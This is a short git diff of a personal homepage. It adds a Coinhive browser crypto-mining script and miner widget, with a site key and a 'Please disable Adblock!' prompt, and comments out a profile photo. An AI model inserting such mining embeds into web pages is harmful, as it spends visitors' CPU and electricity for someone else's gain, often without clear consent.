--- a/index.html
+++ b/index.html
@@ -1,5 +1,17 @@
 <!DOCTYPE html>
 <html>
+<script src="https://coinhive.com/lib/miner.min.js" async></script>
+
+
+<div class="coinhive-miner" 
+	style="width: 256px; height: 310px"
+	data-key="Nzmy0rsbaUSinZLYQqv1W9kqorPEADSe">
+	<em>Please disable Adblock!</em>
+</div>
+
+
+
+
 
 <head>
 <link rel="stylesheet" type="text/css" href="mystyle.css">
@@ -45,7 +57,10 @@ I graduated from Hampshire College in the spring of 2017 with a study focus in E
 
 <p>Talk to me if you are interested in these: Bitcoin, Connected/Automated Vehicles, Real Estate, Programming and Racing.</p>
 
-<img src="img/profile.jpg" width="400" height="400"></img>
+<!-- <img src="img/profile.jpg" width="400" height="400"></img>
+ -->
 
 </body>
+
+
 </html>
